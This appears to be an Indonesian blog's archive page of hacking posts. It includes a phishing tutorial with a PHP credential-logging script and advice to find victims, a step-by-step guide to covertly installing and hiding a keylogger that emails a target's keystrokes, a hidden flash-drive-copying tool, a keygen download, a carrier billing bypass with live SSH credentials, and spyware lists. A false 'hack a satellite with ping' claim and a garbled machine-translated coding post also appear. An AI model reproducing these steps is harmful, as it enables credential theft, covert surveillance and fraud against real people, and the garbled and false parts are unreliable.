Home » 2016 » December

Monthly Archives: December 2016

Cara Internet Gratis Menggunakan HTTP Injector

Berikut langkah – langkah cara internet gratis menggunakan HTTP Injector. Langkah yang akan kita lakukan ini juga berlaku untuk semua Operator (Provider). Di tutorial kali ini Saya akan menjelaskannya step by step secara rinci agar kalian juga bisa menikmati Internet Gratis. Entah itu limit bandwith maupun Unlimited Bandwith.

Mencari Bug Host Operator (Provider)
Pada dasarnya Bug Host yang dicari adalah host yang bisa kita lakukan cek HTTP Header secara gratis Nol Pulsa Nol Kuota atau tanpa adanya biaya akses internet saat melakukan cek Custom Header secara langsung. Atau juga host (URL/IP Address) yang bisa diakses menggunakan Browser secara gratis seperti internet.org dan lainnya. Ada beberapa langkah yang bisa dilakukan untuk mencari Bug Host Operator, diantaranya sebagai berikut :
a. Mengetahui situs resmi Operator SimCard yang digunakan.
Kemungkinan kita bisa mengakses gratis situs resmi Operator. Sehingga kita bisa menggunakannya sebagai Bug Host. Kita bisa mencari Bug Host di Google atau mesin pencari lain, atau dengan bertanya kepada orang lain.
Berikut ini adalah daftar situs resmi operator seluler di Indonesia baik GSM maupun CDMA.
Mentari, IM3, StarOne – http://www.indosat.com – http://www.indosatooredoo.com/
simPATI, Kartu As – http://www.telkomsel.com/
XL, Axis – http://www.xl.co.id/ – http://www.axisnet.id/
Three / 3 – http://www.tri.co.id/
Smart, Fren – http://www.smartfren.com/

b. Menggunakan DNS Databases
DNSDB adalah database yang menyimpan dan mengindeks kedua data DNS pasif yang tersedia melalui perpindahan informasi keamanan “Farsight Security” serta data DNS otoritatif dengan beragam zona operator yang disediakan. DNSDB memudahkan untuk mencari RRsets DNS tersendiri dan memberikan metadata tambahan untuk hasil pencarian seperti saat pertama kali timestamps terlihat dan terakhir dilihat serta lingkungan pengetahuan DNS terkait dengan RRset. DNSDB juga memiliki kemampuan untuk melakukan inverse atau pencarian rdata.
Contoh dalam kasus ini kita menggunakan URL situs resmi Indosat yaitu indosatooredoo.com, kita bisa menggunakan format :

http://URLsitus.dnsdb.org = http://indosatooredoo.com.dnsdb.org

Anda bisa menemukan beberapa daftar Bug Host yang terlihat di dnsdb.org tersebut.
c. Cek Server Headers Bug Host di UriValet.com
Kita perlu mengecek Server Header dari bug host yang telah kita dapatkan melalui dnsdb.org apakah masih aktif atau tidak. Silahkan Cek semua bug di situs UriValet.com atau situs lain dengan tujuan yang sama. Berikut cara Cek Server Headers Bug Host di UriValet.com :

Lengkapi kolom dan informasi yang diperlukan, sesuaikan dengan Gambar 1.1 kemudian klik “Submit” tunggu analisanya sampai sukses.
Lihat status server response, jika 302 atau berwarna kuning berarti bug kemungkinan mati.

d. Memeriksa Informasi Header Host melalui Alat Host Checker yang ada di HTTP Injector
Hal ini diperlukan untuk memastikan apakah host tersebut bisa digunakan ataupun tidak secara gratis Nol Pulsa Nol Kuota atau tanpa adanya biaya akses internet saat melakukan cek Custom Header secara langsung. Lakukan ini saat Nol Pulsa Nol Kuota Nol Nol Nol.
Berikut cara memeriksa informasi Header Host melalui alat host checker yang ada di HTTP Injector :

Klik Tab Alat > Host Checker.
Isi URL dengan bug host yang telah kita dapatkan.
Pilih salah satu method (GET,POST,HEAD,OPTIONS,PUT,DELETE,TRACE,PATCH).
Isi proxy standar operator dengan format (IP:port) atau bisa dengan ceklist “Permintaan Langsung”
Klik “Periksa”.

Inilah proxy standar operator di indonesia:

Kartu Telkomsel (Simpati dan AS) => 10.1.89.130:8000
Kartu Indosat (Mentari dan IM3) => 10.19.19.19:8080
Kartu Three (3AON) => 10.4.0.10:3128
Kartu Axis => 10.8.3.8:8080
Kartu XL => 202.152.240.50:8080

Tidak semua yang respon 200 OK bisa dipakai. Dan tidak semua respon yang bermasalah seperti 302 Found tidak bisa digunakan. Host bisa saja unlimited, mungkin juga limit dibatasi kuotanya oleh operator sekian MB. Speed Download/Upload mungkin dibatasi oleh pihak Operator

Membuat Akun SSH
Kita memerlukan akun SSH untuk bisa menikmati Internet Gratis menggunakan HTTP Injector. Situs yang menyediakannya ada banyak antara lain Bestvpnssh, Createssh, Fastssh, Highssh, Mytunneling, Sshgoogle dan sebagainya.
Saya biasanya daftar di FastSSH. Silahkan Kalian daftar SSHnya kemudian salin informasi akunnya di EditorText yang kalian suka gunakan.

Tips : Pendaftaran X-TRA SG Servers di fastssh.com dibuka setiap 30 menit, standby-lah disaat 2menit sebelum tombol OPEN tersedia “jangan menunggu hijau baru klik OPEN” bisa kalah cepat dengan orang lain, misalnya OPEN jam 07:30 standby jam 07:28, saat itu juga mendaftar usahakan sudah dalam posisi klik “continue create account” dan sudah mengisi password dan capcha, saat di detik-detik terakhir mau 07:30 boomm..!!! segeralah klik “create account”.

Konfigurasi HTTP Injector

Pengaturan SSH
Buka icon menu di HTTP Injector > Pengaturan SSH.
Isi menurut informasi akun SSH yang kalian buat tadi.
Gunakan port 443 atau 22
Penghasil Payload dan menjalankannya
Buka icon menu di HTTP Injector > Penghasil Payload, Lakukan konfigurasi sesuai dengan gambar dibawah ini.
Kemudian klik “Membuat Payload” payload akan terisi otomatis.
Isi kolom Remote Proxy dengan format (ip:port) contoh 10.19.19.19:8080
Klik mulai.
Lihat proses di tab “Log” lihat gambar dibawah ini.

Kalian bisa melihat tanda kunci di status bar yang menandakan HTTP Injector berhasil terhubung.
Membagikan Config
Anda bisa membagikan Config yang telah Anda buat dengan mengekspor config kedalam file dengan extensi *.ehi file. Caranya klik icon titik tiga yang berada di pojok kanan atas kemudian Exspor Config. Isi dan atur sesuai keinginan Anda. Anda juga bisa mengimport Config dari file *.ehi untuk bisa digunakan di HTTP Injector dengan cara klik icon titik tiga di pojok kanan atas lalu pilih “Import Config”.

Download Hasil Config : mykodetutorial_blog.ehi
Update SSH Account Username SSH : fastssh.com-resepion
Password SSH : suyonoion
Host IP Addr : x-sgdo2.serverip.co
Date Created : 09-May-2016
Date Expired : 16-May-2016

Demikian Tutorial Cara Internet Gratis Menggunakan HTTP Injector. Tutorial ini hanya contoh sebagai pengalaman pengguna saja tentang menggunakan tool HTTP Injector Apk untuk menghubungkan SSH/Proxy dengan custom header yang bisa mengakses situs yang diblokir oleh Operator di belakang firewall dengan dukungan SSH tunneling & proxy server.
Tutorial ini bertujuan dengan baik, sebagai pengetahuan saja, mengenai SSH, cek server header sebuah host, tunneling dan proxy server serta tidak bermaksud apa-apa karena blog ini dibawah pengawasan Google yang harus mematuhi TOS Google dan Hukum IT di Indonesia. Dengan Harapan semoga Provider – Provider di Indonesia menyediakan Kuota Bandwith yang lebih murah serta memperbaiki system yang ada.
Kami Mohon maaf jika ada kesalahan kata dalam tutorial Cara Internet Gratis Menggunakan HTTP Injector, kurang lebihnya mohon maaf yang sebesar-besarnya. Jika tutorial ini cukup bermanfaat silahkan bagikan artikel ini. Terimakasih

Universal keygen Untuk semua Software

Download Universal keygen Untuk semua Software. Universal Keygen / Serial Kunci Genarator 2012-2013.Kamu dapat meng-genarate sebagian besar kunci software Anda dengan menggunakan software ini. Ini adalah perangkat lunak yang sangat berguna.Universal Keygen 2013 adalah sebuah Genarator Key dari kumpulan software-software yang sangat populer di dunia.Untuk mengaktifkan perangkat lunak Anda, Anda dapat meng- genarate xaktivasi dan kunci serial dengan menggunakan software ini. Hanya Download dan Jalankan Software ini dan Cari Serial Anda. Fitur Universal Keygen 2013: Genarate semua kunci software Serial. Cari Serial Software abjad Anda Cari Serial Anda Tanpa koneksi internet dengan mudah.

Link Download : http://www.solidfiles.com/d/8c4e4fb277/

Mengambil Data Dari Flasdisk

Anda memiliki teman yang sangat tidak ingin datanya anda copy…????? Jangan kuatir, anda dapat meminjamkan Pc/ Laptop anda kepadanya dan
semua file yang dia miliki akan menjadi milik anda…!!! Gimana caranya,, Yuupss.. Kita Rampok dia,, hehehe.. Seriuuuss akh..!!! Seperti
judulnya, Software Rampok adalah program yang tuhuannya dapat digunakan untuk membajak atau mengkopi setiap data isi di Flashdisk dengan
sendirinya yang terhubung dengan komputer, dimana seluruh file yang ada di flasdisk tersebut akan di copy kedalam hardisk dalam direktory
yang telah ditetapkan.. Cara kerjanya sangat mudah, anda tinggal mengaktifkan program rampok lalu pilih folder tempat untuk menyimpan hasil
kopian dan aktifkan Program Rampoknya. Dan tunggu hingga ada Flashdisk yang tertancap di komputer dan tanpa disadari isi flashdisk sudah
terkopi di komputer. Isi dari flasdisk tidak akan berubah dan tidak terdelete. Program ini tidak bisa dikatakan virus, karena program ini
tujuannya untuk mengambil data dari flasdisk tanpa sepengetahuan si pemilik flashdisk. Hehee 😛 Berhati2lah menggunakan flashdisk di komputer
orang, coba periksa apakah di komputer mereka terdapat program rampok, kalau tidak maka segala dokumen pribadi anda akan dibaca oleh mereka.
===Fitur Rampok v 2 apa aja???=== Rampok yang kedua mempunyai tambahan fasilitas seperti: 1. Menggunakan user dan password (digunakan untuk
menutup aplikasi dan menonaktifkan kerja program). 2. Bisa startup program saat komputer dihidupkan. 3. Menggunakan button on/off untuk
mengaktifkan dan menonaktifkan kerja program. 4. Bisa memilih alamat folder dan nama folder yang akan digunakan menampung hasil copy_an. 5.
Rampok.exe tidak muncul dalam tasklist processes di task manager saat dijalankan. 6. Proses Pengcopian tidak terdeteksi GUInya.

Link Download : http://www.mediafire.com/file/2eicoqq3mldkd5d/U_Rampok_v2.0.rar

Pemrograman Efisien

Tips dan trik untuk pemrograman efisien

Serta hal-hal yang biasa seorang programmer yang baik akan lakukan, ada beberapa masalah khusus untuk MSPGCC yang Anda harus sadar.

1.Jika Anda yakin rutin utama Anda tidak akan pernah keluar, Anda dapat menggunakan “-mendup-at = utama” bendera saat kompilasi. Ini akan menghemat 6 byte ROM.

2.Hindari melewati daftar argumen panjang untuk fungsi. Hindari kembali nilai-nilai lama dari fungsi. Jenis fungsi yang paling efisien untuk digunakan adalah batal, int, atau pointer.

3. Hindari menginisialisasi variabel global dalam fungsi kecil. Sebaliknya, menetapkan nilai selama definisi variabel.

4. Hindari mengkonversi karakter ke jenis lain. variabel arang bisa ditemukan di mana saja di RAM, sedangkan variabel kata hanya bisa berada di bahkan alamat. Karena ini, kode berikut:

const char * a = “1234”;
int k;
k = * ((int *) ((char * a) + 3));

akan menghasilkan perilaku CPU tak terduga.

5. Gunakan int bukannya char atau unsigned char jika Anda ingin bilangan bulat kecil dalam fungsi. Kode yang dihasilkan akan lebih efisien, dan dalam kebanyakan kasus penyimpanan tidak benar-benar sia-sia.

6. Memeriksa kode assembler (S compiler bendera). compiler tidak dapat menghilangkan kode mati dalam beberapa kasus. Jangan menulis kode mati 🙂

7. Tidak menyatakan SFRs Anda sendiri. Mereka semua menyatakan dalam menyertakan file dengan cara yang benar untuk mencapai kinerja kode maksimal.

8. Cobalah untuk meminimalkan penggunaan penjumlahan dan pengurangan dengan angka floating point. Ini adalah operasi lambat.

9. Gunakan pergeseran bukannya perkalian dengan konstanta yang 2 ^ N (sebenarnya, compiler dapat melakukan ini untuk Anda ketika optimasi diaktifkan).

10. Gunakan int unsigned untuk indeks – compiler akan snip _lots_ kode.

11. Gunakan ‘switch / kasus’ membangun daripada rantai konstruksi ‘jika / lain’.

12. Gunakan logis atau ( ‘|’) daripada ‘+’ untuk bitmasks.

13. Ketika mendefinisikan sedikit bidang, cobalah untuk menggunakan bilangan bulat ditandatangani. Ini menghasilkan lebih kode kompak yang sedikit bidang unsigned integer.

14. Gunakan ‘alloca’ bukan ‘malloc’ bagi penduduk setempat. Dalam aplikasi embedded mencoba untuk menghindari alokasi memori dinamis biasanya lebih baik;).

15. C ++ recomendations samping :-), dapat lebih efisien untuk menggunakan:

#define SMTS 1234567890l

bukannya menyatakan

SMTS panjang const = 1234567890l;

16. loop delay adalah rutinitas yang sangat canggih 🙂 Pengembang sering melakukan sesuatu seperti.:

int i = 1234;

ketika saya–);

atau

int i;

untuk (i = 0; i <1234; i ++);

TIDAK AKAN BEKERJA SEBAGAI ANDA HARAPKAN ketika optimasi diaktifkan !!! optimizer akan mendeteksi kode mati di kedua contoh dan akan menghilangkannya. Bahkan mungkin menghilangkan lingkaran sepenuhnya. Menambahkan atribut volatile definisi 'i' mungkin bisa membantu, tetapi tidak mengandalkan itu jika 'i' adalah variabel lokal. compiler masih dapat mendeteksi perhitungan boros, dan menghilangkan mereka.

Terlepas dari masalah optimasi ini, jenis delay loop gaya pemrograman miskin – Anda tidak tahu berapa lama atau pendek penundaan mungkin menghasilkan (meskipun ada minimum jelas terikat!). Akan lebih baik, dan lebih dapat diandalkan untuk menentukan sesuatu seperti:

static void __inline__ brief_pause (daftar unsigned int n)
{
__asm__ __volatile__ (
"1: \ n"
"Desember% [n] \ n"
"Jne 1b \ n"
: [N] "+ r" (n));
}

dan memanggil rutin ini di mana diperlukan. Ini sederhana, kompak, dan dapat diprediksi.

17. Menggunakan atribut volatile untuk variabel yang dapat diubah atau diperiksa oleh lebih dari satu thread pengolahan (mis kode utama dan rutin interupsi). Jika Anda digunakan untuk compiler kurang efisien, Anda dapat digunakan untuk menulis kode seperti:

int i;

interrupt (TIMERA0_VECTOR) irq_routine (void)
{
i = 42;
}

kekosongan func (void)
{

i = 0;
sementara (i == 0);
}

Jika kita asumsikan interupsi bekerja, dan "func" disebut, Anda mungkin berharap "func" untuk kembali setelah timer A interrupt terjadi. Optimizer akan menghasilkan kode yang benar-benar memegang "i" dalam daftar dalam "func", dan loop di "func" tidak akan pernah menanggapi perubahan ke lokasi memori untuk "i", disebabkan dalam rutin interupsi. compiler bahkan mungkin menghilangkan uji "i" sepenuhnya, meninggalkan loop tak terbatas benar.

Untuk memberitahu compiler bahwa itu harus melihat lokasi memori yang sebenarnya dari "i" setiap kali memeriksa atau memanipulasi "i", yang "volatile" atribut harus ditambahkan definisi "i".

18. Hindari menggunakan "volatile" atribut, kecuali hal ini sebenarnya diperlukan. Karena memaksa compiler untuk menghasilkan kode tambahan untuk memuat, menyimpan dan menguji lokasi memori variabel ini dalam semua keadaan, secara signifikan mengurangi efektivitas Optimizer compiler. godaan untuk membuat banyak definisi global "volatile", hanya untuk berbuat salah di sisi yang aman, datang pada harga.

Cobalah untuk menghindari melakukan hal-hal rumit dalam kode Anda, kecuali Anda benar-benar yakin Anda mengerti konsekuensinya. 🙂

7 Sistem Operasi yang Biasa Digunakan Hacker

1. Kali Linux
Kali Linux merupakan sistem operasi Linux berbasi Debian yang didesain untuk . Sistem operasi ini dikembangkan oleh tim dari Offensive Security Ltd. Dimana tim tersebut adalah tim yang sama yang mengembangkan OS BackTrack yang sempat populer dikalangan Hacker.

Read more: https://www.kali.org/downloads/

2. BackBox
Dinomor 2 ada BackBox Linux atau biasa disebut juga BackBox. Sistem operasi berbasis Ubuntu ini memiliki banyak sekali aplikasi-aplikasi penetrasi yang biasa digunakan untuk penetrasi kedalam sistem, komputer forensik, sniffing, eksploitasi dan masih banyak lagi.

Read more: https://backbox.org/download

3. Parrot Security Forensic OS
Selanjutnya ada Parrot-Sec OS. Sistem Operasi ini merupakan gabungan dari OS GNU/Linux berbasis Debian yang dikombinasikan dengan FrozenBox OS serta Kali Linux yang bertujuan untuk memberikan pengalaman terbaik saat melakukan penetrasi dan juga mengetes kemanan dalam suatu sistem. Parrot-Sec OS biasa digunakan pada para pakar keamanan IT.

Parrot Security juga memiliki tools yang cukup lengkap. Selain itu Parrot OS menggunakan tampilan desktop MATE sebagai tampilan defaultnya. Dengan banyaknya dukungan dikomunitas Parrot OS, tidak ada salahnya untuk menggunakan Sistem Operasi ini untuk testing keamanan sistem.

Read more: https://www.parrotsec.org/download.fx

4. DEFT
Deft adalah sistem operasi derivatif dari Linux Ubuntu dimana didalamnya terdapat banyak sekali program-program untuk komputer forensik yang dibuat oleh berbagai macam kalangan individual, tim serta perusahaan keamanan IT.

Read more: http://www.deftlinux.net/download/

5. Live Hacking OS
Live Hacking OS adalah sistem operasi Linux yang didalamnya terdapat berbagai macam program untuk testing keamanan suatu sistem. Live Hacking OS tidak perlu diinstall kedalam PC dan bisa dijalankan melalui media penyimpanan DVD. Dengan menggunakan tampilan User Interface dari GNOME, Live Hacking cukup mudah dipelajari. Sayangnya Live Hacking OS ini sudah tidak dikembangkan sejak pertengahan Mei 2011. Kalian yang ingin mencoba Live Hacking OS bisa mendownloadnya dibawah.

Read more: http://www.livehacking.com/live-hacking-cd/download-live-hacking/

6. Samurai Web Security Framework
Samurai Web Security Framework adalah sebuah OS berbasis linux yang biasa digunakan untuk penetrasi kedalam keamanan web. Didalamnya banyak sekali aplikasi-aplikasi berbasis open-source yang bisa digunakan untuk mengecek keamanan suatu Web. Kalian yang ingin mencoba OS Samurai Web Security Framework bisa mendownload melalui SourceForge dibawah.

Read more: https://sourceforge.net/projects/samurai/files/

7. Network Security Toolkit (NST)
Satu lagi sistem operasi berbasis Fedora yang bisa digunakan untuk hacking, namanya Network Security Toolkit (NST).

Read more: https://sourceforge.net/projects/nst/

Membuat halaman fakelogin

Ha..ha, saya sepertinya sudah gila menerbitkan artikel-artikel yang seharusnya tidak layak dipublikasikan. Tapi tidak mengapalah, saya hanya menyalurkan ide yang tidak bisa selamanya saya simpan dalam kepala penuh dosa ini. Ha3x… Teknik pencurian password menggunakan fake login atau lebih dikenal dengan nama phising telah saya bahas sebelumnya disini. Begitu juga dengan halaman fakelogin untuk facebook juga dapat dilihat disini. Nah bagi yang mau bereksperimen sendiri dengan berbagai halaman login palsu misalnya yahoo mail, gmail, paypal, ebay, atau bahkan account sebuah Bank? silakan dicoba disini ha3x….

Langkah pertama yang dilakukan adalah masuk ke halaman login situs yang menjadi target misalnya yahoo mail. Save Page As (default untuk firefox) atau simpan seluruh halaman secara komplit pada sebuah folder terpisah (misalkan beri nama folder mail). Kamu akan mendapatkan satu buah file html dan sebuah folder yang berisi image dan file lainya. Nah selanjutnya ganti nama file HTML menjadi index.html

Masih pada folder yang sama, buat sebuah file baru dan beri nama serial.txt. Kemudian buah sebuah file php dengan code script di bawah ini. Kemudian Simpan dengan nama login.php. Pastikan kode http://nama-domain.com diganti dengan nama domain tempat penyimpanan file fake login tersebut.

$value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

Langkah berikutnya adalah buka file index.html yang tadi menggunakan text editor. Kemudian cari code yang mengarahkan Form login biasanya diindikasikan dengan nama

Kemudian ganti action ke file login.php yang telah dibuat dan ganti method menjadi GET. Kira-kira hasilnya menjadi seperti ini:

Jika sudah, upload semua file tersebut kedalam hosting kamu sendiri dan mulailah mencari target phising sebagai korban pertama anda.. ha3x… Selamat Mencoba.

Software Hacker Gratis Free

1. Nmap
Saya rasa semua orang telah mendengar yang satu ini, baru berkembang menjadi seri 4.x.
Nmap (“Network Mapper”) adalah utilitas open source gratis untuk eksplorasi jaringan atau keamanan audit. Ia dirancang untuk secara cepat memindai jaringan yang besar, meskipun bekerja dengan baik terhadap host tunggal. Nmap menggunakan paket IP baku dengan cara baru untuk menentukan apa yang host yang tersedia pada jaringan, layanan apa saja (nama dan versi aplikasi) yang host tawarkan, apa sistem operasi (dan versi OS) mereka menjalankan, apa jenis paket filter / firewall sedang digunakan, dan puluhan karakteristik lainnya. Nmap berjalan pada hampir semua jenis komputer dan kedua konsol dan versi grafis yang tersedia. Nmap adalah bebas dan open source.

Link Download : https://nmap.org/download.html

2. Nessus Remote Security Scanner
Baru-baru ini pergi sumber tertutup, tapi masih dasarnya bebas. Bekerja dengan kerangka kerja client-server.
Nessus adalah kerentanan paling populer di dunia pemindai yang digunakan di lebih dari 75.000 organisasi di seluruh dunia. Banyak organisasi terbesar di dunia menyadari penghematan biaya signifikan dengan menggunakan Nessus untuk melakukan audit perusahaan perangkat bisnis penting dan aplikasi.

Link Download : http://www.openwall.com/john/

3. John Ripper yang
Ya, JTR 1,7 baru-baru ini dirilis!
John the Ripper merupakan password cracker yang cepat, saat ini tersedia untuk banyak rasa Unix (11 secara resmi didukung, tidak termasuk arsitektur yang berbeda), DOS, Win32, BeOS, dan OpenVMS. Tujuan utamanya adalah untuk mendeteksi password Unix lemah. Selain beberapa crypt (3) jenis password hash yang paling umum ditemukan di berbagai rasa Unix, didukung di luar kotak adalah Kerberos AFS dan Windows LM hash NT/2000/XP/2003, ditambah dengan beberapa lebih banyak dengan patch kontribusi.

Link Download : http://www.openwall.com/john/

4. Nikto
Nikto adalah Open Source (GPL) web server scanner yang melakukan tes komprehensif terhadap server web untuk beberapa item, termasuk lebih dari 3.200 file berbahaya / CGIS, versi di atas 625 server, dan masalah versi tertentu pada lebih dari 230 server. item Scan dan plugin sering diperbarui dan dapat diupdate secara otomatis (jika diinginkan).
Nikto adalah scanner CGI yang baik, ada beberapa alat lain yang cocok dengan Nikto (fokus pada fingerprinting http atau hacking Google / info gathering dll, artikel lain hanya untuk mereka).

Link Download : https://cirt.net/code/nikto.shtml

5. p0f
P0f v2 adalah alat pasif serbaguna OS fingerprinting. P0f dapat mengidentifikasi sistem operasi pada:
– Mesin yang terhubung ke komputer anda (SYN mode), – Mesin Anda terhubung ke (modus ACK SYN), – Mesin Anda tidak dapat terhubung ke (modus RST), – Mesin yang komunikasi Anda dapat mengamati.
Pada dasarnya bisa apa-apa sidik jari, hanya dengan mendengarkan, hal itu tidak membuat sambungan APAPUN aktif ke mesin target.

Link Download : http://lcamtuf.coredump.cx/p0f3/#/p0f.shtml

Cara Hack satelite Dengan CMD

Hal pertama anda klik program cmd.exe
lalu setelah muncul programnya anda
ketik >ping 8.8.8.8 -t -l 1
setelah itu anda tekan tombol ENTER ,
setelah itu anda lihat maps di aplikasi
chroom dan anda lihat berwarna merah
di maps itu tandanya anda sudah hack
satelite indonesia.

Keylogger

Keylogger, saya rasa sobat blogger udah nggak asing lagi dengan tool hacking yang satu ini. Blazing Tools Perfect Keylogger v1.7.5.0 adalah sebuah program hacking yang bekerja untuk merekam ketikan keyboard, segala aktivitas komputer dalam media text maupun dalam bentuk image (screenshoot). Rata-rata program ini akan menjadi mode stealth sehingga para pengguna komputer tidak dapat mengenali apakah komputer itu dipasangi keylogger atau tidak. Tahu-tahu seluruh data yang pernah dia masukkan ke dalam komputer diketahui oleh orang lain yang tak lain adalah si pemasang program tersebut . Program keylogger kali ini termasuk dalam jenis perfect keylogger yang artinya keylogger yang cukup sempurna untuk digunakan karena memiliki beragam fitur yang tidak dimiliki oleh program keylogger lainnya.

Fitur yang di miliki Blazing Tools Perfect Keylogger v1.7.5.0 :

Dapat benar-benar tak terlihat, termasuk tembus pandang untuk firewall
Visual surveilans ( screenshot )
Captures layar informasi pada setiap mouse klik
Log teks yang diketik dalam setiap aplikasi
Captures dari password di balik tanda bintang
Captures dari klik tombol
Website penebangan fitur
AOL / ICQ / AIM / Yahoo chat penebangan
Online kegiatan penyaringan
Advanced kata kunci deteksi dan pemberitahuan
Clipboard logging
Mengirim log dan screenshot melalui e-mail dalam modus tersembunyi
Stealth meng-upload log melalui FTP
Remote instalasi / update / uninstall
File log terenkripsi dan dapat dilindungi dengan sandi
Monitoring semua pengguna PC, bahkan jika Anda tidak mengetahui password
Mudah melihat log dan manajemen
Ekspor log ke format HTML
Kemungkinan untuk menentukan aplikasi target
Mendukung semua versi Windows, termasuk Windows XP
Sangat mudah digunakan
Dan yang terpenting, bisa merekam kegiatan komputer orang lain dari jarak jauh, biasanya dipasang di warnet-warnet neh sama orang usil, dengan cara delivery via email. Jadi, semua kegiatan komputer orang lain tersebut akan dikirim ke email kamu. Tentu saja kedua pihak harus sama-sama memakai koneksi internet

Cara :

Install program Perfect Keylogger ini di komputer target, dan kalo bisa dihidden seminimalis mungkin hasil program instalan kamu. ( tujuannya cari aman )
Jika sudah terinstall dan tersetting dengan baik, klik kanan pada icon keylogger kanan bawah desktop.>
Lalu klik option, dan akan muncul beberapa pilihan, pilih E-Mail.
Akan ada 2 konten, scheduler dan delivery.
Pada bagian scheduler, centang kotak pada “Try to send logs by email every”
Dan pada pilihan Delivery, pada bagian “send to” masukan alamat email kamu untuk menerima kiriman emailnya dari komputer target.
Untuk SMTP server, masukan SMTP provider dari email kamu. PENTING! untuk mengaktifkan SMTP, Tentu saja harus diaktifin dulu fiturnya dari akun email mu sendiri. Dan saya rekomendasikan memakai yahoo saja, dengan akun email embel-embel belakangnya co.id, jangan memakai yang .com!! Contoh : bagi pengguna provider yahoo, biasanya servernya “smtp.mail.yahoo.co.id”
Biarkan port numbernya tetap 25.
User name dan password masukan. User name dan password didapat sewaktu kamu mengaktifkan SMTP di yahoo kamu.
Authentication Method pilih AUTH LOGIN.
Klik ok, dan untuk mencoba nya klik send.

Cara Penggunaan :

1. Download Software Blazing Tools Perfect Keylogger v1.7.5.0 Full Version
2. Install seperti menginstall Software biasa (saya yakin sobat blogger pasti bisa 😀 )
3. Pada awal penginstallan akan muncul seperti gambar, klik saja Enter Registration Code (nanti isikan pada file yg telah sobat download)

4. Setelah Penginstallan klik kanan pada tray icon di taskbar bawah

Keterangan :

Beri centang “Run On Windows Start Up” (keylogger akan aktif dengan sendirinya bila komputer baru di jalankan).
Beri centang “Hide the program from Ctrl+Alt+Del” ( keylogger akan tersembunyi dari task manager ).
Untuk kenyamanan dan keamanan, saya sarankan untuk mengganti tombol hotkey nya. ( di gunakan untuk menghiden / menampilkan icon keylogger ).
Sekali lagi klik kanan tray icon program tersebut di taskbar windows dan pilih Hide Program Icon ( berguna untuk menyembunyikan program tersebut dari user lain ).

5. Untuk melihat hasil dari program tersebut silahkan tekan tombol kombinasi yang disetting sebelumnya, pada contoh diatas menggunakan tombol kombinasi Shift+K atau klik kiri pada icon tray program tersebut, sehingga tampilannya akan tampak seperti pada gambar dibawah ini.

(karna admin juga baru nginstall jadi masih kosong 😀 )

NB : Sebelum instal keylogger, harap disable dahulu Antivirus anda. Software BlazingTools Perfect Keylogger v1.7.5.0 ini sudah saya uji dan berjalan dengan baik. 100 % Tested n Worked By Me. Software ini jangan di salah gunakan untuk mencuri email dan password s’seorang. Ini hanya untuk share dari cara penggunaan Keylogger

Download Link : http://www.4shared.com/file/u6vumHgBce/Blazingtools_Perfect_Keylogger.html
http://www.4shared.com/office/IkNdGvcGba/Serial_Number.html

Aplikasi Hacking PC dan Android

Hacking adalah Seorang Hacker yang seharusnya tidak mempunyai hak atas suatu sistem menjadi mempunyai hak penuh dari sistem tersebut. Pada intinya Hacking itu kegiatan yang menjebol atau masuk ke dalam sebuah sistem tanpa diketahui oleh si Admin.

Bagi sebagian orang hacking merupakan pekerjaan yang sia-sia karena tidak akan membawa manfaat positif bagi dirinya. Namun dari sebagian orang yang menyukai seni hacker/pecinta hacker, Aplikasi hacking adalah merupakan hasil karya dari orang pintar yang sangat menarik untuk di pelajari. Kita dapat menggunakan aplikasi hacking untuk menjahili teman-temen dekat atau kerabat. Sedangkan pengunaan aplikasi hacking untuk perbuatan kriminal, seperti kejahatan pencurian dan kejahatan lainya tidak sangat di anjurkan, selain akan merugikan orang lain, Perbuatan ini juga melanggar hukum sehingga penggunaya dapat kebalik jeruji besi.
Berikut ini aplikasi koleksi aplikasi hacking yang bisa anda pelajari dan tidak digunakan untuk melakukan sesuatu yang tergolong tindakan kriminal.

1. Active Password Changer
Tool ini merupakan aplikasi hacking yang bisa mengubah password yang terdapat dalam komputer manapun yang bisa kita akses secara fisik. Aplikasi ini memiliki beberapa fitur dengan kemampuan kerja yang cukup baik.
Beberapa pekerjaan yang bisa dilakukan tool ini, di antaranya adalah melakukan booting dari cd, floopy disk, atau USB. Tak hanya itu, tool ini pun menyediakan CD burner sederhana untuk memburning file pada CD.

2. Spytech Spy Agen
Tool ini merupakan sebuah aplikasi mata-mata yang akan mencatat segala aktivitas user secara sembunyi-sembunyi. Semua file log atau aktivitas user yang tersimpan dapat kita enkripsi sehingga mudah terlihat. Tool yang satu ini memiliki cara penggunaan yang mudah, cukup dengan menekan Ctrl+Shift+Alt+M, maka tool default ini akan langsung bekerja.

Di samping kelima aplikasi hacking yang paling diminati tersebut, masih banyak lagi aplikasi lainnya. Berikut adalah beberapa aplikasi tersebut.
3. Cain
jika kita bertanya pada para hacker tentang tool yang paling populer yang berada pada kalangan mereka,boleh jadi jawaban yang akan mereka berikan adalah cain. Cain merupakan aplikasi hacking yang serbabisa sehingga sangat digemari oleh para hacker.Cain bukan hanya bisa digunakan hacking password, melainkan bisa mengumpulkan nilai hash dari berbagai sumber.

4.Active password changer
Tool ini merupakan aplikasi hacking yang bisa mengubah password yang terdapat dalam komputer manapun yang dpat kita akses secara fisik.aplikasi ini memiliki beberapa fitur dengan kemammpuan kerja yang cukup baik. Beberapa pekerjaan yang dapat dilakukan oleh tool ini, diantaranya adalah dapat melakukan booting dari cd,floopy disk, USB. Tak hanya itu tool ini pun menyediakan CD Burner sederhana unyuk memburning file pada cd.

5.Dumpacl-dumpsec
Tool ini yang sering digunakan para hacker untuk melakukan pekerjaan yang berkaitan dengan enumerasi. Dengan memanfaatkan Nulls connections, Tool ini mampu menampilkan user acount aktif secara detail. Semua aktivitas yang dilakukan oleh sebuah account aktif terekam oleh tool ini. Dulu, sebelumnya bernama Dumplacl-dumpsec tool ini memiliki nama dump ACL.

6.Handy keylogger
Tool ini sama dengan aplikasi lainya, yakni tak akan bisa dideteksi oleh Task Manager. Setiap aktifitas yang dikerjakan komputer yang telah dipasangi aplikasi ini akan tercatat seluruhnya, Sehingga anda dapat mengetahui apa saja yang dilakukan oleh pengguna komputer itu, Misalnya apa saja yang telah diketikan oleh pengguna, halaman web apa yang telah dikunjungi dll.

7.Spytech spy agen
